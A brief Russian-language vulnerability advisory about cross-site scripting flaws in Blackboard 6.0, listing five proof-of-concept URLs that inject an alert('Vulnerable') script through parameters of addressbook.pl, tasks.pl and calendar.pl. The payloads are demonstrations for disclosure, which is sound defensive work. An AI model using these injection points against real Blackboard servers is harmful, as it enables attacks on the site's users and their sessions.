Программа: Blackboard 6.0 

Несколько уязвимостей обнаружено в Blackboard. Удаленный пользователь может выполнить XSS нападение. 

http://[victim]/bin/common/addressbook.pl?action= ADD&nav=my_addressbook&course=
‘%3E%3Cscript%3Ealert(‘Vulnerable’) %3C/script%3E

http://[victim]/bin/common/tasks.pl?action=c &display=T.subject&filter=—!!all&course_id=
&render_type=’%3E%3Cscript%3Ealert(‘Vulnerable’)%3C/

http
://[victim]/bin/common/calendar.pl?course_name =%22%3E%3Cscript%3Ealert(‘Vulnerable’)
%3C/script%3E

http://[victim]/bin/common/calendar.pl?courseID =%22%3E%3Cscript%3Ealert(‘Vulnerable’)
%3C/script%3E

http://[victim]/bin/common/calendar.pl?subroutine =%22%3E%3Cscript%3Ealert(‘Vulnerable’)
%3C/script%3E



Оставить мнение